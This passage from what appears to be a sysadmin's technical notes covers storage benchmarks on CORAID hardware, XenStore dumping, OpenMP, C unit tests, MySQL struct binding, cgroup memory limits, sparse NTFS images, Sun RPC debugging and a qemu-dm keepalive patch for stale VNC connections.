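For example, backend_ops(100, 50) counts 450 backend GETs and 150 backend PUTs, which is worth keeping in mind when comparing the vnode timings with the FSM timings.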

CORAID speed test

Hardware: 2x10Gb link, 36x2TB drives on CORAID SRX 4200.
aoe-stat
e0.X 2000.398GB eth2,eth3 8704 up
(36 drives total)
ethtool eth2
Speed: 10000Mb/s
ethtool eth3
Speed: 10000Mb/s
 
cec -s 0 eth2
disks
0.0 2000.398GB X.0.0 WDC WD2003FYYS-02W0B0 01.01D01 sata 3.0Gb/s
(36 drives total)
list -l
X 2000.399GB online
X.0 2000.399GB jbod normal
X.0.0 normal 2000.399GB 0.X
(36 JBODs total)
CORAID raw device speed (using aio, O_DIRECT to bypass the cache, O_SYNC, and different RAID types):
  • JBODs, 36 LUNs of 2TB each, 4 simultaneous requests/LUN, reads and writes in 4K blocks
50% reads, 50% writes = 220.45 iops/LUN, 2m5.678s/1000000 blocks
reads = 163.39 iops/LUN, 2m49.834s/1000000 blocks
writes = 455.37 iops/LUN, 1m0.602s/1000000 blocks
  • raid6rs, 4 LUNs of 14TB each, 100 simultaneous requests/LUN, reads and writes in 4K blocks
50% reads, 50% writes = 274.72 iops/LUN, 1m31.482s/100000 blocks
reads = 1524.39 iops/LUN, 2m43.648s/1000000 blocks
writes = 164.47 iops/LUN, 2m31.699s/100000 blocks
  • raid5, 4 LUNs of 16TB each, 100 simultaneous requests/LUN, reads and writes in 4K blocks
50% reads, 50% writes = 827.81 iops/LUN, 2m31.095s/500000 blocks
reads = 1519.94 iops/LUN, 2m44.482s/1000000 blocks
writes = 555.55 iops/LUN, 0m44.665s/100000 blocks

See the test program. You need libaio for it (POSIX aio in librt is implemented with pthreads, which is not appropriate given the massive parallelism in our tests).

Xenstore for fun and profit

The XenStore is the configuration database in which Xen stores information on the running domUs. Although Xen uses the XenStore internally for vital matters like setting up virtual devices, you can also write arbitrary data to it from domUs as well as from dom0. Think of it as some sort of interdomain socket.
I've stolen a useful script from The Book of Xen
#!/bin/bash

function dumpkey() {
  local param=${1}
  local key
  local result
  result=$(xenstore-list ${param})
  if [ "${result}" != "" ] ; then
    for key in ${result} ; do dumpkey ${param}/${key} ; done
  else
    echo -n ${param}'='
    xenstore-read ${param}
  fi
}

for key in /vm /local/domain /tool ; do dumpkey ${key} ; done
Let's run it
/vm/00000000-0000-0000-0000-000000000000/on_xend_stop=ignore
/vm/00000000-0000-0000-0000-000000000000/shadow_memory=0
/vm/00000000-0000-0000-0000-000000000000/uuid=00000000-0000-0000-0000-000000000000
/vm/00000000-0000-0000-0000-000000000000/on_reboot=restart
/vm/00000000-0000-0000-0000-000000000000/image/ostype=linux
/vm/00000000-0000-0000-0000-000000000000/image/kernel=
/vm/00000000-0000-0000-0000-000000000000/image/cmdline=
/vm/00000000-0000-0000-0000-000000000000/image/ramdisk=
/vm/00000000-0000-0000-0000-000000000000/on_poweroff=destroy
/vm/00000000-0000-0000-0000-000000000000/bootloader_args=
/vm/00000000-0000-0000-0000-000000000000/on_xend_start=ignore
/vm/00000000-0000-0000-0000-000000000000/on_crash=restart
/vm/00000000-0000-0000-0000-000000000000/xend/restart_count=0
/vm/00000000-0000-0000-0000-000000000000/vcpus=4
/vm/00000000-0000-0000-0000-000000000000/vcpu_avail=15
/vm/00000000-0000-0000-0000-000000000000/bootloader=
/vm/00000000-0000-0000-0000-000000000000/name=Domain-0
/vm/00000000-0000-0000-0000-000000000000/memory=2796
/local/domain/0/vm=/vm/00000000-0000-0000-0000-000000000000
/local/domain/0/device=
/local/domain/0/control/platform-feature-multiprocessor-suspend=1
/local/domain/0/error=
/local/domain/0/memory/target=2863104
/local/domain/0/guest=
/local/domain/0/hvmpv=
/local/domain/0/cpu/1/availability=online
/local/domain/0/cpu/3/availability=online
/local/domain/0/cpu/2/availability=online
/local/domain/0/cpu/0/availability=online
/local/domain/0/name=Domain-0
/local/domain/0/console/limit=1048576
/local/domain/0/console/type=xenconsoled
/local/domain/0/domid=0
/local/domain/0/device-model=
/tool/xenstored=
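The same recursive walk can be sketched in Python. This is only an illustration of the idea, not a replacement for the script above: it assumes the xenstore-list and xenstore-read tools are on the PATH, and the function names (xs_list, xs_read, dump, main) are mine.

```python
import subprocess


def xs_list(path):
    """Return the child key names of a XenStore path (empty list for a leaf)."""
    out = subprocess.check_output(["xenstore-list", path])
    return out.decode().split()


def xs_read(path):
    """Return the value stored at a XenStore path."""
    out = subprocess.check_output(["xenstore-read", path])
    return out.decode().rstrip("\n")


def dump(path, list_fn=xs_list, read_fn=xs_read):
    """Yield (path, value) pairs for every leaf below path, depth first."""
    children = list_fn(path)
    if not children:
        yield path, read_fn(path)
        return
    for child in children:
        for item in dump(path + "/" + child, list_fn, read_fn):
            yield item


def main():
    # Same three roots as in the shell script.
    for root in ("/vm", "/local/domain", "/tool"):
        for key, value in dump(root):
            print("%s=%s" % (key, value))
```

Call main() in dom0 to get output in the same key=value form. The list and read functions are parameters so the walk can be tried without Xen.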

Xenoprof, Xen profiling

Xenoprof is a system-wide profiler for Xen virtual machine environments, capable of profiling the Xen virtual machine monitor, multiple Linux guest operating systems, and applications running on them. (http://xenoprof.sourceforge.net/)
A little bit outdated but still useful Xenoprof overview & Networking Performance Analysis.

SMP as easy as you cannot imagine

In contrast to MPP, where MPI is the standard, in the SMP world pthreads are the de facto standard way to make your program execute in parallel. But there is another standard: OpenMP.
test_parallel.c
#include <stdio.h>
#include <unistd.h>

#ifdef _OPENMP
  #include <omp.h>
#else
  #define omp_get_thread_num() 0
#endif


int main(int argc, char **argv) {
  int n = 10;
  int i;
  
  #pragma omp parallel
  {
    printf("thread %d\n", omp_get_thread_num());

    #pragma omp for
    for (i = 1; i <= n; i++ ) {
      sleep(1);
    }
  }
}
Test
gcc test_parallel.c
time ./a.out 
thread 0

real    0m10.002s
user    0m0.000s
sys     0m0.001s
Enable OpenMP
gcc -fopenmp test_parallel.c
time ./a.out 
thread 3
thread 7
thread 0
thread 4
thread 1
thread 5
thread 6
thread 2

real    0m2.002s
user    0m0.009s
sys     0m0.004s
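Why 2 seconds and not 10/8 = 1.25? Ten one-second iterations cannot be split evenly over 8 threads, so some thread gets two of them and sets the pace. Below is a small Python sketch of this arithmetic, plus a thread pool analogue of the loop. It is not OpenMP; I assume iterations are spread as evenly as possible, and the function names are made up for the illustration.

```python
import math
import time
from concurrent.futures import ThreadPoolExecutor


def expected_wall_time(iterations, threads, seconds_per_iteration):
    """The busiest thread runs ceil(iterations / threads) iterations."""
    return math.ceil(iterations / float(threads)) * seconds_per_iteration


def run_parallel(iterations, threads, seconds_per_iteration):
    """Run the sleeps on a pool of worker threads and return the elapsed time."""
    start = time.time()
    with ThreadPoolExecutor(max_workers=threads) as pool:
        # list() forces all tasks to finish before the clock is stopped.
        list(pool.map(time.sleep, [seconds_per_iteration] * iterations))
    return time.time() - start
```

expected_wall_time(10, 8, 1) gives 2 and expected_wall_time(10, 1, 1) gives 10, which agrees with both runs above.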

Smoke and unit tests for C

Take a look at the vstr library source code. It is a de facto standard for implementing tests in C without any additional tools like googletest. See below what to do if you do not want to add one more tool to your project but still need tests.
tst_main.c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

#include "backup_app.h"
#include "tst.h"

int main (int argc, char ** argv) {

    DBHOST = "127.0.0.1";
    DBUSER = "root";
    DBDB = "???";
    DBPORT = 3306;

    return tst();
}


/*---------------------------------------------------
  mocks */

int snmp_log(int priority, const char *format, ...) {
    va_list ap;

    va_start(ap, format);

    if (vfprintf(stderr, format, ap) < 0)
        goto error;

    va_end(ap);
    return 0;


error:
    va_end(ap);
    return 1;
}
One of the tests, tst_cmd_ok.c
#include <stdlib.h>
#include "extern_cmd.h"
#include "tst.h"

int tst() {
    int     ret;
    char   *args[] = {"/bin/ls", "-l", NULL};
    char   *res = mb_cmd_exec(args, NULL);
    ret = (res) ? SUCCESS : FAILED;
    free(res);
    return ret;
}
Makefile
.PHONY: clean

CC=gcc

CFLAGS=-g -Wall -I..
LDFLAGS=-Wl,--unresolved-symbols=ignore-all
HEADERS=$(wildcard ../*.h)
OBJECTS=$(patsubst %.c,%.o,$(wildcard *.c))
TO_TEST_OBJECTS=$(patsubst %.c,%.o,$(wildcard ../*.c))
MAIN_TST_OBJ=tst_main.o
BUILDLIBS=-lmysqlclient_r -lpthread

_TESTS=$(patsubst %.c,%,$(wildcard *.c))
TESTS=$(patsubst tst_main,,$(_TESTS))

all: $(OBJECTS) $(TESTS)

%.o: %.c $(HEADERS)
    $(CC) $(CFLAGS) -c $<

$(TESTS): $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) $(OBJECTS)
    $(CC) $(CFLAGS) $(LDFLAGS) $(patsubst %,%.o,$@) $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) -o $@ $(BUILDLIBS)

clean:
    rm -f *~ *.o $(TESTS)
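Note LDFLAGS=-Wl,--unresolved-symbols=ignore-all: it tells the linker not to report unresolved symbols, so a test still links when some symbols it never calls are missing.
Script to start the tests, test.sh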
#!/bin/sh

for result in `find . -maxdepth 1 -perm /u=x,g=x,o=x -type f -name 'tst_*'`;
do
  $result
  exit_st=$?
  if [ $exit_st -eq 0 ]
  then
    echo $result : ok
  else
    echo $result : failed
  fi
done
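If the test suite grows, the same runner can be sketched in Python to get a summary and an overall exit status. This is an optional variant under the same convention as test.sh (executable files named tst_* in one directory, exit status 0 means success); run_tests and report are names I made up.

```python
import os
import subprocess


def run_tests(directory="."):
    """Run every executable regular file named tst_* and return {name: passed}."""
    results = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not name.startswith("tst_"):
            continue
        # Skip sources and objects such as tst_main.c or tst_main.o.
        if not (os.path.isfile(path) and os.access(path, os.X_OK)):
            continue
        results[name] = subprocess.call([path]) == 0
    return results


def report(results):
    """Print one line per test and return True only if all tests passed."""
    for name, passed in sorted(results.items()):
        print("%s : %s" % (name, "ok" if passed else "failed"))
    return all(results.values())
```

For instance, report(run_tests(".")) prints the same ok/failed lines as the shell script and returns False if any test failed.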

Simplistic ORM like thing in C for MySQL

Take a look at extern_mysql.h and extern_mysql.c. It is a simple request-to-struct mapping done in C for MySQL 5.0 and above for one of the projects. libmysql_r is not the simplest thing to work with; the code provided was tested in production, so it works. Take a look if you had a bad day and were forced to get data from MySQL in C.

A few words about an interface. To get data from mysql:
1) add request to mb_mysql_stmt:
mb_mysql_stmt_t mb_mysql_stmt[] = {
    ...
    {
        "select * from SCHEDULE",
        NULL, NULL, sizeof(mb_db_schedule_t), bind_r_schedule
    },
    ...
};
where bind_r_schedule is a binding definition:
mb_bind_t   bind_r_schedule[] = {
    {"schedule_id",     offsetof(mb_db_schedule_t, schedule_id),        sizeof(((mb_db_schedule_t*)0)->schedule_id),    0},
    {"name",            offsetof(mb_db_schedule_t, name),               sizeof(((mb_db_schedule_t*)0)->name),           0},
    {"schedule_type",   offsetof(mb_db_schedule_t, schedule_type),      sizeof(((mb_db_schedule_t*)0)->schedule_type),  0},
    {"enabled",         offsetof(mb_db_schedule_t, enabled),            sizeof(((mb_db_schedule_t*)0)->enabled),        0},
    {"last_backup",     offsetof(mb_db_schedule_t, last_backup),        sizeof(((mb_db_schedule_t*)0)->last_backup),    0},
    {NULL, 0, 0, 0}
};
This means that mb_db_exec() will return an array of mb_db_schedule_t, where each element corresponds to one row in the result set. Bindings are used to map fields in the result set to struct members; consult C API Prepared Statement Type Codes to map MySQL types to C ones (for MYSQL_TIME, mb_time_t is defined). The length of the array will be stored in the variable pointed to by the count argument of the mb_db_exec() function.
If you want to get a single value from the db you can use, for instance
mb_bind_t   bind_r_config_value[] = {
    {"value",   0,  256, 0},
    {NULL, 0, 0, 0}
};
mb_mysql_stmt_t mb_mysql_stmt[] = {
    ...
    {
        "select value from CONFIG where `key`='address'",
        NULL, NULL, 256, bind_r_config_value
    },
    ...
};
We do not use a struct here and map the whole row to a buffer of 256 bytes (256 is the max length of the value field in the config table). To obtain the result call
char *data;
data = mb_db_exec(mb_db_ip_address_stmt, NULL);
if (!data)
    mb_log_err("cannot find ip address");
Note that we do not need count here. Also note that bindings can be reused (bind_r_config_value can be used to obtain various values from config table).
2) add request number to mb_db_stmt_e enum:
typedef enum {
    ...
    mb_db_ip_address_stmt
} mb_db_stmt_e;
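The idea behind the bindings (a column name plus an offset and a size inside the struct) can be tried out in Python with ctypes. This is only a sketch of the concept, not the library's code: the Schedule layout below is hypothetical, since the real field types of mb_db_schedule_t are not shown here, and make_bindings and row_to_struct are names I invented.

```python
import ctypes


class Schedule(ctypes.Structure):
    # Hypothetical layout, for illustration only.
    _fields_ = [
        ("schedule_id", ctypes.c_int),
        ("name", ctypes.c_char * 64),
        ("enabled", ctypes.c_byte),
    ]


def make_bindings(struct_type):
    """Build (column, offset, size) triples, the analogue of an mb_bind_t table."""
    return [
        (name, getattr(struct_type, name).offset, getattr(struct_type, name).size)
        for name, _ctype in struct_type._fields_
    ]


def row_to_struct(struct_type, bindings, row):
    """Copy the raw bytes of each column to its bound offset and build the struct."""
    buf = bytearray(ctypes.sizeof(struct_type))
    for column, offset, size in bindings:
        data = row[column][:size]          # never write past the member
        buf[offset:offset + len(data)] = data
    return struct_type.from_buffer_copy(buf)
```

The point of the design is the same as in the C code: the mapping is plain data, so one generic function can fill any struct without knowing its type.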

Cgroups, limit memory

If an application may eat a lot of memory and cause swapping, you can put it into a sandbox.
Test app memtest.c
#include <stdlib.h>
#include <stdio.h>


int main() {
    int     i;
    void   *p;

    p = NULL;

    for (i = 0; 1; i+= 4096) {
        p = malloc(4096);
        if (!p) {
            perror("malloc");
            break;
        }
        printf("allocated %d bytes\n", i);
    }

}
Create new group and add to it current shell process
mkdir /sys/fs/cgroup/memory/0
echo $$ > /sys/fs/cgroup/memory/0/tasks
Configure memory limit
echo 4M > /sys/fs/cgroup/memory/0/memory.limit_in_bytes
Test
gcc memtest.c
./a.out
...
allocated 3997696 bytes
Killed
As you may have noticed, malloc didn't return NULL: the app receives a signal and terminates, because swap is not used and the kernel kills one of the processes when there is not enough free memory left.
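The same steps can be wrapped into a small Python helper. It is a sketch that assumes the cgroup v1 memory controller mounted at /sys/fs/cgroup/memory, as in the commands above (cgroup v2 uses different file names); limit_memory and its parameters are my own naming. Unlike the shell session, it sets the limit before moving the process into the group.

```python
import os


def limit_memory(group, limit, pid=None, root="/sys/fs/cgroup/memory"):
    """Create a memory cgroup, set its limit and move a process into it."""
    path = os.path.join(root, group)
    if not os.path.isdir(path):
        os.mkdir(path)
    # Suffixes such as 4M are accepted here, exactly as with echo above.
    with open(os.path.join(path, "memory.limit_in_bytes"), "w") as f:
        f.write(str(limit))
    # By default the calling process itself is moved into the group.
    with open(os.path.join(path, "tasks"), "w") as f:
        f.write(str(os.getpid() if pid is None else pid))
    return path
```

Run as root, limit_memory("0", "4M") mirrors the commands above for the calling process and the children it starts afterwards.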

Prepare sparse raw image with ntfs

Create sparse file
dd if=/dev/zero of=test.img bs=1 count=0 seek=1995G
0+0 records in
0+0 records out
0 bytes (0 B) copied, 1.1611e-05 s, 0.0 kB/s
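For the curious, here is what the dd trick does, sketched in Python: the file gets its size set without any data being written, so the apparent size and the space actually allocated differ. create_sparse is a name I made up, and whether the file ends up sparse depends on the filesystem.

```python
import os


def create_sparse(path, size):
    """Create a file of `size` bytes without writing data blocks.

    Returns (apparent_size, allocated_bytes).
    """
    with open(path, "wb") as f:
        f.truncate(size)
    st = os.stat(path)
    # st_blocks counts 512-byte units actually allocated on disk.
    return st.st_size, st.st_blocks * 512
```

On a filesystem with sparse file support the second number stays close to zero, while ls -l reports the full size.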
Create partition table
echo 'n
p
1


t
7
w
' | /sbin/fdisk -u test.img
Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0x2cddb521.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.

Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)

Command (m for help): Partition type:
   p   primary (0 primary, 0 extended, 4 free)
   e   extended
Select (default p): Partition number (1-4, default 1): First sector (2048-4183818239, default 2048): Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-4183818239, default 4183818239): Using default value 4183818239

Command (m for help): Selected partition 1
Hex code (type L to list codes): Changed system type of partition 1 to 7 (HPFS/NTFS/exFAT)

Command (m for help): The partition table has been altered!

Syncing disks.
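The sector numbers fdisk prints can be checked by hand: the image is 1995 GiB and a sector is 512 bytes. A tiny Python sketch of this arithmetic (the helper names are mine):

```python
SECTOR = 512  # bytes per sector, as used by fdisk -u


def last_sector(image_bytes, sector=SECTOR):
    """Number of the last addressable sector of an image."""
    return image_bytes // sector - 1


def partition_bytes(first, last, sector=SECTOR):
    """Size in bytes of a partition spanning sectors first..last inclusive."""
    return (last - first + 1) * sector
```

last_sector(1995 * 2**30) is 4183818239, the default last sector offered by fdisk above, and the partition starts 2048 * 512 = 1048576 bytes into the file.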
Format first partition
/sbin/kpartx -a test.img
/usr/sbin/mkntfs -c4096 -s512 -p63 -H255 -S63 -Ff --label Drive_E /dev/mapper/loop0p1
/sbin/kpartx -d test.img
loop deleted : /dev/loop0
Mount/umount first partition
/sbin/kpartx -a test.img
mkdir exposed
/usr/bin/ntfs-3g -o rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/mapper/loop0p1 exposed
...
umount exposed
/sbin/kpartx -d test.img
loop deleted : /dev/loop0

How to debug Sun RPC

I bet you are used to debugging web services via some sniffer like wireshark. This is possible because of protocol simplicity (yes, even if it is SOAP with attachments it is still a simple text XML-based protocol).
Sun RPC is a rather popular IPC mechanism on Linux; by its nature it resembles Java RMI. Sun RPC is complex, binary and uses multiple connections. In brief, there is an rpcbind daemon (in other words, portmapper) that is a registry of services: a client asks rpcbind for the port of a specific service and then connects directly to the service. For instance, NFS is built around Sun RPC; nfs-server uses port 2049 by default, but it can be registered on any other port and clients can still find it through the registry (nfs-utils prior to 1.2 has port 2049 hardcoded though).

So how to deal with this if you hit some trouble? There is the rpcdebug utility
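To make the registry lookup less abstract, here is a minimal Python sketch of the question a client asks rpcbind: the GETPORT call of the portmapper protocol, version 2, encoded by hand in XDR. It assumes rpcbind answers on UDP port 111 and uses AUTH_NONE credentials; the function names and the fixed xid are mine, and error handling is reduced to the bare minimum.

```python
import socket
import struct

PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT = 100000, 2, 3
NFS_PROG = 100003


def build_getport_call(xid, prog, vers, proto=socket.IPPROTO_TCP):
    """Encode an RPC call to GETPORT (all fields are big-endian 32-bit words)."""
    # xid, message type CALL (0), RPC version 2, program, version, procedure
    header = struct.pack(">6I", xid, 0, 2, PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT)
    # credentials and verifier: flavor AUTH_NONE (0) with zero length, twice
    auth_none = struct.pack(">4I", 0, 0, 0, 0)
    # arguments: the program, version and protocol we look for; port is unused
    args = struct.pack(">4I", prog, vers, proto, 0)
    return header + auth_none + args


def parse_getport_reply(xid, data):
    """Return the port from an accepted GETPORT reply (0 means not registered)."""
    rxid, mtype, reply_stat, _flavor, vlen = struct.unpack(">5I", data[:20])
    if rxid != xid or mtype != 1 or reply_stat != 0:
        raise ValueError("unexpected RPC reply")
    vlen = (vlen + 3) & ~3                 # XDR pads opaque data to 4 bytes
    accept_stat, port = struct.unpack(">2I", data[20 + vlen:28 + vlen])
    if accept_stat != 0:
        raise ValueError("call was not successful")
    return port


def getport(host, prog, vers, proto=socket.IPPROTO_TCP, timeout=3.0):
    """Ask rpcbind on host which port the given program is registered on."""
    xid = 0x12345678
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.settimeout(timeout)
        s.sendto(build_getport_call(xid, prog, vers, proto), (host, 111))
        data, _addr = s.recvfrom(1024)
    finally:
        s.close()
    return parse_getport_reply(xid, data)
```

With an NFS server at hand, getport(host, NFS_PROG, 3) should return the port nfs-server is registered on.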
The rpcdebug command allows an administrator to set and clear the Linux kernel's NFS client and server debug flags. Setting these flags causes the kernel to emit messages to the system log in response to NFS activity; this is typically useful when debugging NFS problems.
rpcdebug -vh
usage: rpcdebug [-v] [-h] [-m module] [-s flags...|-c flags...]
       set or cancel debug flags.

Module     Valid flags
rpc        xprt call debug nfs auth bind sched trans svcsock svcdsp misc cache all
nfs        vfs dircache lookupcache pagecache proc xdr file root callback client mount all
nfsd       sock fh export svc proc fileop auth repcache xdr lockd all
nlm        svc client clntlock svclock monitor clntsubs svcsubs hostcache xdr all

rpcdebug -m rpc -s all
rpc        xprt call debug nfs auth bind sched trans svcsock svcdsp misc cache
See /var/log/syslog
...
Jan  6 13:40:58 HDC05 kernel: [1430624.387439] RPC:       set up transport to address addr=10.1.2.11 port=48355 proto=udp
Jan  6 13:40:58 HDC05 kernel: [1430624.387533] RPC:       created transport ffff88000eb2c000 with 16 slots
Jan  6 13:40:58 HDC05 kernel: [1430624.387588] RPC:       creating mount client for db01 (xprt ffff88000eb2c000)
Jan  6 13:40:58 HDC05 kernel: [1430624.387672] RPC:       creating UNIX authenticator for client ffff88002f863200
Jan  6 13:40:58 HDC05 kernel: [1430624.389041] RPC:     0 holding NULL cred ffffffffa0118da0
Jan  6 13:40:58 HDC05 kernel: [1430624.389091] RPC:       new task initialized, procpid 21435
Jan  6 13:40:58 HDC05 kernel: [1430624.389142] RPC:       allocated task ffff88002b3fe1c0
Jan  6 13:40:58 HDC05 kernel: [1430624.389192] RPC:   850 __rpc_execute flags=0x280
Jan  6 13:40:58 HDC05 kernel: [1430624.389240] RPC:   850 call_start mount3 proc NULL (sync)
Jan  6 13:40:58 HDC05 kernel: [1430624.389290] RPC:   850 call_reserve (status 0)
...

Xen VNC and stale tcp connections

The problem: if a VNC client terminates without sending a packet with the FIN/RST flag (for instance, the VNC connection was tunneled through a VPN and the tunnel was closed), the connection on the server side remains in the ESTABLISHED state and one cannot connect to this VM via VNC again, see vnc stops working after a while.
The solution of this simple problem is a bit complicated. First of all tcp keepalive on vnc server socket should be turned on, in other words one must patch qemu-dm that implements VNC in Xen (Xen Opensource 3.4.2).
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/osdep.c xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c
--- xen-3.4.2/tools/ioemu-qemu-xen/osdep.c      2009-11-05 11:44:56.000000000 +0000
+++ xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c  2011-12-28 13:43:29.938649747 +0000
@@ -338,4 +338,11 @@
     f = fcntl(fd, F_GETFL);
     fcntl(fd, F_SETFL, f | O_NONBLOCK);
 }
+
+int socket_set_keepalive(int fd) {
+    int optval;
+    
+    optval = 1;
+    return setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &optval, sizeof(optval));
+}
 #endif
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h
--- xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h        2009-11-05 11:44:56.000000000 +0000
+++ xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h    2011-12-28 13:43:32.788255661 +0000
@@ -41,6 +41,7 @@
 
 /* misc helpers */
 void socket_set_nonblock(int fd);
+int socket_set_keepalive(int fd);
 int send_all(int fd, const void *buf, int len1);
 
 /* New, ipv6-ready socket helper functions, see qemu-sockets.c */
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/vnc.c xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c
--- xen-3.4.2/tools/ioemu-qemu-xen/vnc.c        2009-11-05 11:44:56.000000000 +0000
+++ xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c    2011-12-28 13:44:59.283974757 +0000
@@ -2389,6 +2389,8 @@
        VNC_DEBUG("New client on socket %d\n", vs->csock);
        dcl->idle = 0;
         socket_set_nonblock(vs->csock);
+    if (socket_set_keepalive(vs->csock) == -1)
+        VNC_DEBUG("Cannot set KEEPALIVE on socket %d\n", vs->csock);
        qemu_set_fd_handler2(vs->csock, NULL, vnc_client_read, NULL, opaque);
        vnc_write(vs, "RFB 003.008\n", 12);
        vnc_flush(vs);
Recompile xen tools (make tools, see xen README) and replace qemu-dm executable with dist/install/usr/lib64/xen/bin/qemu-dm.
Configure linux kernel
HDC11:~# sysctl -a | grep ipv4.tcp_keep
net.ipv4.tcp_keepalive_time = 30
net.ipv4.tcp_keepalive_probes = 5
net.ipv4.tcp_keepalive_intvl = 10
This means: if there are no packets for 30 seconds, send an empty probe; if no ACK is received, repeat the probe every 10 seconds, 5 probes in total; if there is still no answer, send RST and close the connection.
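For a quick experiment outside qemu-dm, the same socket option can be set from Python. This is a sketch, not what the patch does: besides SO_KEEPALIVE it also sets the per-socket timers (TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT), which exist on Linux and override the sysctl values for that socket only. The function names are mine.

```python
import socket


def enable_keepalive(sock, idle=30, interval=10, probes=5):
    """Turn on TCP keepalive for one socket and, where supported, tune its timers."""
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    for name, value in (("TCP_KEEPIDLE", idle),
                        ("TCP_KEEPINTVL", interval),
                        ("TCP_KEEPCNT", probes)):
        # These constants are platform specific, so set only what exists.
        if hasattr(socket, name):
            sock.setsockopt(socket.IPPROTO_TCP, getattr(socket, name), value)


def detection_time(idle=30, interval=10, probes=5):
    """Seconds between the last traffic and the reset of a dead connection."""
    return idle + interval * probes
```

With the values above detection_time() is 80 seconds: 30 seconds of silence, then 5 probes 10 seconds apart, then the reset.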
Test
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
tcp 0 0 10.10.17.11:5901 10.10.17.216:1334 ESTABLISHED 28905/qemu-dm <---- VNC connection via VPN
HDC11:~# tcpdump -n -i eth2 port 1334
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 96 bytes
07:42:15.119612 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1601431976 win 5840
07:42:15.316704 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228
07:42:45.319980 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- acks every 30 secs
07:42:45.701610 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228 <--- response to ack
07:43:15.700307 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- kill vpn, no response anymore
07:43:25.700398 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840
07:43:35.700586 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840
07:43:45.700639 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840
07:43:55.700765 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- 5 probes every 10 secs
07:44:05.700913 IP 10.10.17.11.5901 > 10.10.17.216.1334: R 1:1(0) ack 1 win 5840 <--- still no response, RST
^C
10 packets captured
10 packets received by filter
0 packets dropped by kernel
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
<--- no ESTABLISHED connections
HDC11:~# telnet localhost 5901 <--- we can connect to this port again
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
RFB 003.008 <--- server responds
^]
telnet> quit
But we need to go deeper. TCP keepalive works only when there are no packets on the wire. Imagine the VNC server sent some packet and the connection was terminated silently (i.e. the server didn't receive an ACK for its packet). In this case Linux will keep retransmitting the packet, with a growing retransmission timeout (RTO), until it runs out of retries.
07:57:36.123013 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1557:1598(41) ack 377 win 5840
07:57:36.317922 IP 10.10.17.216.1421 > 10.10.17.11.5901: P 377:387(10) ack 1598 win 63353 <--- here we lost connection
07:57:36.360862 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840
07:58:06.317741 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840
07:58:16.321445 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840
07:58:16.932260 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- vnc server (qemu-dm) tries to send some data
07:58:17.621451 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- retransmit algorithm starts with dynamic growing intervals
07:58:19.001467 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:58:21.761500 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:58:27.281590 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:58:38.321648 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:59:00.401919 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
07:59:44.562552 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:01:12.883584 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:03:12.885069 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:05:12.886487 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
